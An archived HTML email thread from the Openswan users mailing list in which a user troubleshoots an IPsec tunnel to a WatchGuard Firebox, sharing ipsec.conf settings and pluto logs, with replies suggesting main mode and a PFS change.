<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title>perhaps peer likes no proposal</title>
<style>
<!--
/* Font Definitions */
@font-face
{font-family:SimSun;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:Palatino-Italic;
panose-1:0 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
{font-family:SimSun;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:\5FAE\8F6F\96C5\9ED1;
panose-1:2 11 5 3 2 2 4 2 2 4;}
@font-face
{font-family:"\@\5FAE\8F6F\96C5\9ED1";
panose-1:2 11 5 3 2 2 4 2 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
p
{mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
font-size:12.0pt;
font-family:"Times New Roman";}
p.Aaron-Headline2, li.Aaron-Headline2, div.Aaron-Headline2
{margin:0cm;
margin-bottom:.0001pt;
font-size:16.0pt;
font-family:"Times New Roman";
font-weight:bold;}
p.Aaron-Headline1, li.Aaron-Headline1, div.Aaron-Headline1
{margin:0cm;
margin-bottom:.0001pt;
font-size:22.0pt;
font-family:"Times New Roman";
font-weight:bold;}
p.Aaron-Character, li.Aaron-Character, div.Aaron-Character
{margin:0cm;
margin-bottom:.0001pt;
text-indent:10.0pt;
line-height:125%;
font-size:12.0pt;
font-family:"Times New Roman";}
p.Aaron-Headline3, li.Aaron-Headline3, div.Aaron-Headline3
{margin:0cm;
margin-bottom:.0001pt;
font-size:14.0pt;
font-family:"Times New Roman";
font-weight:bold;}
span.EmailStyle22
{mso-style-type:personal-reply;
font-family:\5FAE\8F6F\96C5\9ED1;
color:blue;
font-weight:normal;
font-style:normal;
text-decoration:none none;}
@page Section1
{size:595.3pt 841.9pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=ZH-CN link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'>I
think the phase1 has been established successfully , so it does not result
from the aggressive mode. <o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'>Could
you disable the pfs=no and have a try ?<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face=微软雅黑><span
lang=EN-US style='font-size:10.0pt;font-family:\5FAE\8F6F\96C5\9ED1;color:blue'><o:p> </o:p></span></font></p>
<div>
<p class=MsoNormal><font size=2 color=blue face="Times New Roman"><span
lang=EN-US style='font-size:10.0pt;color:blue'>Thanks! </span></font><font
color=blue><span lang=EN-US style='color:blue'><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=blue face="Times New Roman"><span
lang=EN-US style='font-size:10.0pt;color:blue'>Aaron (Bo) Zhang</span></font><span
lang=EN-US><o:p></o:p></span></p>
</div>
<div>
<div class=MsoNormal align=center style='text-align:center'><font size=3
face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'>
<hr size=2 width="100%" align=center tabindex=-1>
</span></font></div>
<p class=MsoNormal><b><font size=2 face=Tahoma><span lang=EN-US
style='font-size:10.0pt;font-family:Tahoma;font-weight:bold'>From:</span></font></b><font
size=2 face=Tahoma><span lang=EN-US style='font-size:10.0pt;font-family:Tahoma'>
users-bounces@openswan.org [mailto:users-bounces@openswan.org] <b><span
style='font-weight:bold'>On Behalf Of </span></b>simon charles<br>
<b><span style='font-weight:bold'>Sent:</span></b> 2008</span></font><font
size=2 face=宋体><span style='font-size:10.0pt;font-family:SimSun'>Äê</span></font><font
size=2 face=Tahoma><span lang=EN-US style='font-size:10.0pt;font-family:Tahoma'>11</span></font><font
size=2 face=宋体><span style='font-size:10.0pt;font-family:SimSun'>ÔÂ</span></font><font
size=2 face=Tahoma><span lang=EN-US style='font-size:10.0pt;font-family:Tahoma'>26</span></font><font
size=2 face=宋体><span style='font-size:10.0pt;font-family:SimSun'>ÈÕ</span></font><font
size=2 face=Tahoma><span lang=EN-US style='font-size:10.0pt;font-family:Tahoma'>
3:28<br>
<b><span style='font-weight:bold'>To:</span></b> tudor.georgescu@aardman.com;
users@openswan.org<br>
<b><span style='font-weight:bold'>Subject:</span></b> Re: [Openswan Users]
perhaps peer likes no proposal</span></font><span lang=EN-US><o:p></o:p></span></p>
</div>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-US
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-bottom:12.0pt'><font size=2 face=Verdana><span
lang=EN-US style='font-size:10.0pt;font-family:Verdana'>Hi !<br>
From the logs - openswan is trying to connect using
'aggressive mode' - is the watchguard expecting to connect using aggresive mode
?. Aggressive mode is less secure than main mode - unless you are using a
roadwarrior configuration - i would recommend that you use main mode.<br>
Thanks !<o:p></o:p></span></font></p>
<div class=MsoNormal align=center style='text-align:center'><font size=2
face=Verdana><span lang=EN-US style='font-size:10.0pt;font-family:Verdana'>
<hr size=2 width="100%" align=center id=stopSpelling>
</span></font></div>
<p class=MsoNormal><font size=2 face=Verdana><span lang=EN-US style='font-size:
10.0pt;font-family:Verdana'>Date: Tue, 25 Nov 2008 17:33:16 +0000<br>
From: Tudor.Georgescu@aardman.com<br>
To: users@openswan.org<br>
Subject: [Openswan Users] perhaps peer likes no proposal<br>
<br>
Hey guys,<br>
I have been struggling with this for a few days now. I've become thoroughly
stuck on this on what I believe may be phase2.<br>
<br>
I am trying to connect openswan-2.6.19 [left] (and openswan-2.6.19 upto the .19
release) to a WatchGuard Firebox [right].<br>
<br>
Many releases ago, this was once possible: http://wiki.openswan.org/index.php/Interop/InteroperatingWatchguard<br>
<br>
Unfortunately following many tutorials and the Paul and Ken book has still left
me in the dark.<br>
<br>
I have been on the #openswan irc channel and they suggested that "perhaps
peer likes no proposal" means I'm not matching IKE or ESP properly. I've
checked, double checked, and thrice checked both ends, but I'm still getting
stuck.<br>
<br>
Settings-wise what is still a mystery to me is the tunnel settings. On the
Watchguard end, its configured to give me the virtual IP of a.b.c.d, which puts
me on the network w.x.y.z/24. I've tried various rightnexthop/rightsubnet
settings, but that does not appear to make any changes to the connection. Am I
barking up the wrong tree? Does the tunnel have anything to do with
"perhaps peer likes no proposal"?<br>
<br>
Any explinations of what the following means would also be much appreciated.
I.e. what is STATE_AGGR_I2 trying to achieve?<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: discarding duplicate packet --
exhausted retransmission; already STATE_AGGR_I2<br>
<br>
Thank you in advance guys and gals.<br>
<br>
Tudor<br>
<br>
# /etc/ipsec.conf - Openswan IPsec configuration file<br>
version 2.0 # conforms to second version of ipsec.conf
specification<br>
<br>
config setup<br>
interfaces=%defaultroute<br>
nat_traversal=yes<br>
OE=off<br>
protostack=netkey<br>
uniqueids=yes<br>
<br>
conn myvpn<br>
pfs=yes<br>
authby=secret<br>
type=tunnel<br>
aggrmode=yes<br>
keyexchange=ike<br>
auth=esp<br>
ike=aes256-sha1-modp1024<br>
esp=aes256-sha1;modp1024<br>
left=10.0.0.128<br>
leftsubnet=10.0.0.0/24<br>
leftnexthop=10.0.0.138<br>
leftid=my@id.com<br>
right=<vpn.public.ip><br>
#rightnexthop=a.b.c.d<br>
rightsubnet=w.x.y.z/24<br>
rightid=<vpn.public.ip><br>
auto=start<br>
<br>
The output was from rel 2.6.18, but I get the same from 2.6.19.<br>
<br>
/var/log/messages<br>
<br>
localhost pluto[26477]: shutting down<br>
localhost pluto[26477]: forgetting secrets<br>
localhost pluto[26477]: "myvpn": deleting connection<br>
localhost pluto[26477]: "myvpn" #1: deleting state (STATE_AGGR_I2)<br>
localhost pluto[26477]: "myvpn": request to delete a unrouted policy
with netkey kernel --- experimental<br>
localhost pluto[26477]: shutting down interface lo/lo ::1:500<br>
localhost pluto[26477]: shutting down interface lo/lo 127.0.0.1:4500<br>
localhost pluto[26477]: shutting down interface lo/lo 127.0.0.1:500<br>
localhost pluto[26477]: shutting down interface eth0/eth0 10.0.0.128:4500<br>
localhost pluto[26477]: shutting down interface eth0/eth0 10.0.0.128:500<br>
localhost ipsec__plutorun: Starting Pluto subsystem...<br>
localhost pluto[27033]: Starting Pluto (Openswan Version 2.6.18; Vendor ID
OE}ZvZ@M[OWD) pid:27033<br>
localhost pluto[27033]: Setting NAT-Traversal port-4500 floating to on<br>
localhost pluto[27033]: port floating activation criteria
nat_t=1/port_float=1<br>
localhost pluto[27033]: including NAT-Traversal patch
(Version 0.6c)<br>
localhost pluto[27033]: using /dev/urandom as source of random entropy<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating
OAKLEY_TWOFISH_CBC_SSH: Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_TWOFISH_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_SERPENT_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_AES_CBC: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating OAKLEY_BLOWFISH_CBC:
Ok (ret=0)<br>
localhost pluto[27033]: ike_alg_register_hash(): Activating OAKLEY_SHA2_512: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_hash(): Activating OAKLEY_SHA2_256: Ok
(ret=0)<br>
localhost pluto[27033]: starting up 1 cryptographic helpers<br>
localhost pluto[27034]: using /dev/urandom as source of random entropy<br>
localhost pluto[27033]: started helper pid=27034 (fd:7)<br>
localhost pluto[27033]: Using Linux 2.6 IPsec interface code on 2.6.26.5-28.fc8
(experimental code)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: Ok
(ret=0)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: FAILED
(ret=-17)<br>
localhost pluto[27033]: ike_alg_register_enc(): WARNING: enc alg=0 not found in
constants.c:oakley_enc_names<br>
localhost pluto[27033]: ike_alg_add(): ERROR: Algorithm already exists<br>
localhost pluto[27033]: ike_alg_register_enc(): Activating <NULL>: FAILED
(ret=-17)<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/cacerts'<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/aacerts'<br>
localhost pluto[27033]: Changed path to directory '/etc/ipsec.d/ocspcerts'<br>
localhost pluto[27033]: Changing to directory '/etc/ipsec.d/crls'<br>
localhost pluto[27033]: Warning: empty directory<br>
localhost pluto[27033]: Changing back to directory '/tmp' failed - (2 No such
file or directory)<br>
localhost pluto[27033]: Changing back to directory '/tmp' failed - (2 No such
file or directory)<br>
localhost pluto[27033]: added connection description "myvpn"<br>
localhost pluto[27033]: listening for IKE messages<br>
localhost pluto[27033]: adding interface eth0/eth0 10.0.0.128:500<br>
localhost pluto[27033]: adding interface eth0/eth0 10.0.0.128:4500<br>
localhost pluto[27033]: adding interface lo/lo 127.0.0.1:500<br>
localhost pluto[27033]: adding interface lo/lo 127.0.0.1:4500<br>
localhost pluto[27033]: adding interface lo/lo ::1:500<br>
localhost pluto[27033]: loading secrets from "/etc/ipsec.secrets"<br>
localhost pluto[27033]: "myvpn": request to add a prospective erouted
policy with netkey kernel --- experimental<br>
localhost pluto[27033]: "myvpn" #1: initiating Aggressive Mode #1,
connection "myvpn"<br>
localhost pluto[27033]: | setting sec: 1<br>
localhost pluto[27033]: "myvpn" #1: received Vendor ID payload [Dead
Peer Detection]<br>
localhost pluto[27033]: "myvpn" #1: received Vendor ID payload
[draft-ietf-ipsec-nat-t-ike-02_n] method set to=106<br>
localhost pluto[27033]: "myvpn" #1: Aggressive mode peer ID is
ID_IPV4_ADDR: '<vpn.public.ip>'<br>
localhost pluto[27033]: "myvpn" #1: NAT-Traversal: Result using
draft-ietf-ipsec-nat-t-ike-02/03: i am NATed<br>
localhost pluto[27033]: "myvpn" #1: Aggressive mode peer ID is
ID_IPV4_ADDR: '<vpn.public.ip>'<br>
localhost pluto[27033]: "myvpn" #1: transition from state
STATE_AGGR_I1 to state STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: STATE_AGGR_I2: sent AI2, ISAKMP
SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_256 prf=oakley_sha
group=modp1024}<br>
localhost pluto[27033]: "myvpn" #2: initiating Quick Mode
PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW {using isakmp#1 msgid:131f6317
proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: retransmitting in response to
duplicate packet; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #1: discarding duplicate packet --
exhausted retransmission; already STATE_AGGR_I2<br>
localhost pluto[27033]: "myvpn" #2: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
localhost pluto[27033]: "myvpn" #2: starting keying attempt 2 of at
most 3<br>
Nov 21 18:02:42 localhost pluto[27033]: "myvpn" #3: initiating Quick
Mode PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW to replace #2 {using
isakmp#1 msgid:bd4d55d2 proposal=AES(12)_256-SHA1(2)_160
pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #3: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
localhost pluto[27033]: "myvpn" #3: starting keying attempt 3 of at
most 3<br>
localhost pluto[27033]: "myvpn" #4: initiating Quick Mode
PSK+ENCRYPT+TUNNEL+PFS+UP+AGGRESSIVE+IKEv2ALLOW to replace #3 {using isakmp#1
msgid:947f04f5 proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_MODP1024}<br>
localhost pluto[27033]: "myvpn" #4: max number of retransmissions (2)
reached STATE_QUICK_I1. No acceptable response to our first Quick Mode
message: perhaps peer likes no proposal<br>
<br>
- --------------------------------------------------------------------<br>
http://www.aardman.com<br>
<br>
______________________________________________________________________<br>
This message has been checked for all known viruses by the MessageLabs<o:p></o:p></span></font></p>
</div>
</body>
</html>